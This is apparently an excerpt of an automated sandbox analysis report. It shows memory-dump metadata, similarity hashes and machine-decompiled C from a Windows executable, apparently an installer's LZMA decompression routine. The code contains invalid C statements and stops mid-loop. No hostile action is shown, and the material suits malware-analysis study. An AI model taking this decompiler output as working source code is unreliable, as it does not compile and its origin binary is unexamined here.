                                                                                                                          0x004065d7
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x00406356
                                                                                                                          0x00406356
                                                                                                                          0x00000000
                                                                                                                          0x00406356
                                                                                                                          0x004065d7
                                                                                                                          0x0040680c
                                                                                                                          0x0040682e
                                                                                                                          0x00406834
                                                                                                                          0x00406836
                                                                                                                          0x0040683d
                                                                                                                          0x0040683f
                                                                                                                          0x00406846
                                                                                                                          0x0040684a
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00000000
                                                                                                                          0x00406843
                                                                                                                          0x00406690
                                                                                                                          0x00406716
                                                                                                                          0x0040671c
                                                                                                                          0x0040671f
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x004065e2

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                                                                                                          • Instruction ID: 736e54d1ea8bc2ffbcc58a3ee687e8f06aed80bce92bf0dad63538ea203c4f31
                                                                                                                          • Opcode Fuzzy Hash: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                                                                                                          • Instruction Fuzzy Hash: 77913271D00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281D7789A86DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004062F4() {
                                                                                                                          				unsigned short _t532;
                                                                                                                          				signed int _t533;
                                                                                                                          				void _t534;
                                                                                                                          				void* _t535;
                                                                                                                          				signed int _t536;
                                                                                                                          				signed int _t565;
                                                                                                                          				signed int _t568;
                                                                                                                          				signed int _t589;
                                                                                                                          				signed int* _t606;
                                                                                                                          				void* _t613;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t613 - 0x40) != 0) {
                                                                                                                          						L89:
                                                                                                                          						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                                                          						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                                                          						L69:
                                                                                                                          						_t606 =  *(_t613 - 0x58);
                                                                                                                          						 *(_t613 - 0x84) = 0x12;
                                                                                                                          						L132:
                                                                                                                          						 *(_t613 - 0x54) = _t606;
                                                                                                                          						L133:
                                                                                                                          						_t532 =  *_t606;
                                                                                                                          						_t589 = _t532 & 0x0000ffff;
                                                                                                                          						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                          						if( *(_t613 - 0xc) >= _t565) {
                                                                                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                          							 *(_t613 - 0x40) = 1;
                                                                                                                          							_t533 = _t532 - (_t532 >> 5);
                                                                                                                          							 *_t606 = _t533;
                                                                                                                          						} else {
                                                                                                                          							 *(_t613 - 0x10) = _t565;
                                                                                                                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                                                          						}
                                                                                                                          						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                          							L139:
                                                                                                                          							_t534 =  *(_t613 - 0x84);
                                                                                                                          							L140:
                                                                                                                          							 *(_t613 - 0x88) = _t534;
                                                                                                                          							goto L1;
                                                                                                                          						} else {
                                                                                                                          							L137:
                                                                                                                          							if( *(_t613 - 0x6c) == 0) {
                                                                                                                          								 *(_t613 - 0x88) = 5;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          							goto L139;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						if( *(__ebp - 0x60) == 0) {
                                                                                                                          							L171:
                                                                                                                          							_t536 = _t535 | 0xffffffff;
                                                                                                                          							L172:
                                                                                                                          							return _t536;
                                                                                                                          						}
                                                                                                                          						__eax = 0;
                                                                                                                          						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          						0 | _t258 = _t258 + _t258 + 9;
                                                                                                                          						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                          						L75:
                                                                                                                          						if( *(__ebp - 0x64) == 0) {
                                                                                                                          							 *(__ebp - 0x88) = 0x1b;
                                                                                                                          							L170:
                                                                                                                          							_t568 = 0x22;
                                                                                                                          							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                          							_t536 = 0;
                                                                                                                          							goto L172;
                                                                                                                          						}
                                                                                                                          						__eax =  *(__ebp - 0x14);
                                                                                                                          						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          						if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          							__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          						}
                                                                                                                          						__edx =  *(__ebp - 8);
                                                                                                                          						__cl =  *(__eax + __edx);
                                                                                                                          						__eax =  *(__ebp - 0x14);
                                                                                                                          						 *(__ebp - 0x5c) = __cl;
                                                                                                                          						 *(__eax + __edx) = __cl;
                                                                                                                          						__eax = __eax + 1;
                                                                                                                          						__edx = 0;
                                                                                                                          						_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                          						__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          						__edx = _t274;
                                                                                                                          						__eax =  *(__ebp - 0x68);
                                                                                                                          						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          						_t283 = __ebp - 0x64;
                                                                                                                          						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                          						 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          						L79:
                                                                                                                          						 *(__ebp - 0x14) = __edx;
                                                                                                                          						L80:
                                                                                                                          						 *(__ebp - 0x88) = 2;
                                                                                                                          					}
                                                                                                                          					L1:
                                                                                                                          					_t535 =  *(_t613 - 0x88);
                                                                                                                          					if(_t535 > 0x1c) {
                                                                                                                          						goto L171;
                                                                                                                          					}
                                                                                                                          					switch( *((intOrPtr*)(_t535 * 4 +  &M0040684B))) {
                                                                                                                          						case 0:
                                                                                                                          							if( *(_t613 - 0x6c) == 0) {
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          							_t535 =  *( *(_t613 - 0x70));
                                                                                                                          							if(_t535 > 0xe1) {
                                                                                                                          								goto L171;
                                                                                                                          							}
                                                                                                                          							_t539 = _t535 & 0x000000ff;
                                                                                                                          							_push(0x2d);
                                                                                                                          							asm("cdq");
                                                                                                                          							_pop(_t570);
                                                                                                                          							_push(9);
                                                                                                                          							_pop(_t571);
                                                                                                                          							_t609 = _t539 / _t570;
                                                                                                                          							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                                                          							asm("cdq");
                                                                                                                          							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                                                          							 *(_t613 - 0x3c) = _t604;
                                                                                                                          							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                          							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                                                          							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                          							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                          								L10:
                                                                                                                          								if(_t612 == 0) {
                                                                                                                          									L12:
                                                                                                                          									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          									goto L15;
                                                                                                                          								} else {
                                                                                                                          									goto L11;
                                                                                                                          								}
                                                                                                                          								do {
                                                                                                                          									L11:
                                                                                                                          									_t612 = _t612 - 1;
                                                                                                                          									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                          								} while (_t612 != 0);
                                                                                                                          								goto L12;
                                                                                                                          							}
                                                                                                                          							if( *(_t613 - 4) != 0) {
                                                                                                                          								GlobalFree( *(_t613 - 4));
                                                                                                                          							}
                                                                                                                          							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          							 *(_t613 - 4) = _t535;
                                                                                                                          							if(_t535 == 0) {
                                                                                                                          								goto L171;
                                                                                                                          							} else {
                                                                                                                          								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                          								goto L10;
                                                                                                                          							}
                                                                                                                          						case 1:
                                                                                                                          							L13:
                                                                                                                          							__eflags =  *(_t613 - 0x6c);
                                                                                                                          							if( *(_t613 - 0x6c) == 0) {
                                                                                                                          								 *(_t613 - 0x88) = 1;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          							_t45 = _t613 - 0x48;
                                                                                                                          							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                          							__eflags =  *_t45;
                                                                                                                          							L15:
                                                                                                                          							if( *(_t613 - 0x48) < 4) {
                                                                                                                          								goto L13;
                                                                                                                          							}
                                                                                                                          							_t547 =  *(_t613 - 0x40);
                                                                                                                          							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                                                          								L20:
                                                                                                                          								 *(_t613 - 0x48) = 5;
                                                                                                                          								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                          								goto L23;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x74) = _t547;
                                                                                                                          							if( *(_t613 - 8) != 0) {
                                                                                                                          								GlobalFree( *(_t613 - 8)); // executed
                                                                                                                          							}
                                                                                                                          							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                          							 *(_t613 - 8) = _t535;
                                                                                                                          							if(_t535 == 0) {
                                                                                                                          								goto L171;
                                                                                                                          							} else {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          						case 2:
                                                                                                                          							L24:
                                                                                                                          							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                          							 *(_t613 - 0x84) = 6;
                                                                                                                          							 *(_t613 - 0x4c) = _t554;
                                                                                                                          							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                                                          							goto L132;
                                                                                                                          						case 3:
                                                                                                                          							L21:
                                                                                                                          							__eflags =  *(_t613 - 0x6c);
                                                                                                                          							if( *(_t613 - 0x6c) == 0) {
                                                                                                                          								 *(_t613 - 0x88) = 3;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          							_t67 = _t613 - 0x70;
                                                                                                                          							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          							__eflags =  *_t67;
                                                                                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          							L23:
                                                                                                                          							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                          							if( *(_t613 - 0x48) != 0) {
                                                                                                                          								goto L21;
                                                                                                                          							}
                                                                                                                          							goto L24;
                                                                                                                          						case 4:
                                                                                                                          							goto L133;
                                                                                                                          						case 5:
                                                                                                                          							goto L137;
                                                                                                                          						case 6:
                                                                                                                          							__edx = 0;
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__ecx =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x34) = 1;
                                                                                                                          								 *(__ebp - 0x84) = 7;
                                                                                                                          								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          								goto L132;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          							__esi =  *(__ebp - 0x60);
                                                                                                                          							__cl = 8;
                                                                                                                          							__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          							__ecx =  *(__ebp - 0x3c);
                                                                                                                          							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          							__ecx =  *(__ebp - 4);
                                                                                                                          							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          							__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          							if( *(__ebp - 0x38) >= 4) {
                                                                                                                          								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          								if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          									_t98 = __ebp - 0x38;
                                                                                                                          									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          									__eflags =  *_t98;
                                                                                                                          								} else {
                                                                                                                          									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x38) = 0;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          							if( *(__ebp - 0x34) == __edx) {
                                                                                                                          								__ebx = 0;
                                                                                                                          								__ebx = 1;
                                                                                                                          								goto L61;
                                                                                                                          							} else {
                                                                                                                          								__eax =  *(__ebp - 0x14);
                                                                                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          									__eflags = __eax;
                                                                                                                          								}
                                                                                                                          								__ecx =  *(__ebp - 8);
                                                                                                                          								__ebx = 0;
                                                                                                                          								__ebx = 1;
                                                                                                                          								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          								goto L41;
                                                                                                                          							}
                                                                                                                          						case 7:
                                                                                                                          							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          							if( *(__ebp - 0x40) != 1) {
                                                                                                                          								__eax =  *(__ebp - 0x24);
                                                                                                                          								 *(__ebp - 0x80) = 0x16;
                                                                                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          								__eax =  *(__ebp - 0x28);
                                                                                                                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          								__eax =  *(__ebp - 0x2c);
                                                                                                                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          								__eax = 0;
                                                                                                                          								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          								__al = __al & 0x000000fd;
                                                                                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								 *(__ebp - 0x58) = __eax;
                                                                                                                          								goto L69;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 4);
                                                                                                                          							__ecx =  *(__ebp - 0x38);
                                                                                                                          							 *(__ebp - 0x84) = 8;
                                                                                                                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          							goto L132;
                                                                                                                          						case 8:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__ecx =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x84) = 0xa;
                                                                                                                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          							} else {
                                                                                                                          								__eax =  *(__ebp - 0x38);
                                                                                                                          								__ecx =  *(__ebp - 4);
                                                                                                                          								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          								 *(__ebp - 0x84) = 9;
                                                                                                                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          							}
                                                                                                                          							goto L132;
                                                                                                                          						case 9:
                                                                                                                          							goto L0;
                                                                                                                          						case 0xa:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 4);
                                                                                                                          								__ecx =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x84) = 0xb;
                                                                                                                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          								goto L132;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x28);
                                                                                                                          							goto L88;
                                                                                                                          						case 0xb:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__ecx =  *(__ebp - 0x24);
                                                                                                                          								__eax =  *(__ebp - 0x20);
                                                                                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          							} else {
                                                                                                                          								__eax =  *(__ebp - 0x24);
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x28);
                                                                                                                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          							L88:
                                                                                                                          							__ecx =  *(__ebp - 0x2c);
                                                                                                                          							 *(__ebp - 0x2c) = __eax;
                                                                                                                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          							goto L89;
                                                                                                                          						case 0xc:
                                                                                                                          							L99:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0xc;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t334 = __ebp - 0x70;
                                                                                                                          							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t334;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							__eax =  *(__ebp - 0x2c);
                                                                                                                          							goto L101;
                                                                                                                          						case 0xd:
                                                                                                                          							L37:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0xd;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t122 = __ebp - 0x70;
                                                                                                                          							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t122;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							L39:
                                                                                                                          							__eax =  *(__ebp - 0x40);
                                                                                                                          							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          								goto L48;
                                                                                                                          							}
                                                                                                                          							__eflags = __ebx - 0x100;
                                                                                                                          							if(__ebx >= 0x100) {
                                                                                                                          								goto L54;
                                                                                                                          							}
                                                                                                                          							L41:
                                                                                                                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          							__ecx =  *(__ebp - 0x58);
                                                                                                                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          							 *(__ebp - 0x48) = __eax;
                                                                                                                          							__eax = __eax + 1;
                                                                                                                          							__eax = __eax << 8;
                                                                                                                          							__eax = __eax + __ebx;
                                                                                                                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__edx = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								 *(__ebp - 0x40) = 1;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								__ebx = __ebx + __ebx + 1;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edx;
                                                                                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          							 *(__ebp - 0x44) = __ebx;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								goto L39;
                                                                                                                          							} else {
                                                                                                                          								goto L37;
                                                                                                                          							}
                                                                                                                          						case 0xe:
                                                                                                                          							L46:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0xe;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t156 = __ebp - 0x70;
                                                                                                                          							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t156;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							while(1) {
                                                                                                                          								L48:
                                                                                                                          								__eflags = __ebx - 0x100;
                                                                                                                          								if(__ebx >= 0x100) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eax =  *(__ebp - 0x58);
                                                                                                                          								__edx = __ebx + __ebx;
                                                                                                                          								__ecx =  *(__ebp - 0x10);
                                                                                                                          								__esi = __edx + __eax;
                                                                                                                          								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          								__ax =  *__esi;
                                                                                                                          								 *(__ebp - 0x54) = __esi;
                                                                                                                          								__edi = __ax & 0x0000ffff;
                                                                                                                          								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          									__cx = __ax;
                                                                                                                          									_t170 = __edx + 1; // 0x1
                                                                                                                          									__ebx = _t170;
                                                                                                                          									__cx = __ax >> 5;
                                                                                                                          									__eflags = __eax;
                                                                                                                          									 *__esi = __ax;
                                                                                                                          								} else {
                                                                                                                          									 *(__ebp - 0x10) = __ecx;
                                                                                                                          									0x800 = 0x800 - __edi;
                                                                                                                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          									__ebx = __ebx + __ebx;
                                                                                                                          									 *__esi = __cx;
                                                                                                                          								}
                                                                                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          								 *(__ebp - 0x44) = __ebx;
                                                                                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          									continue;
                                                                                                                          								} else {
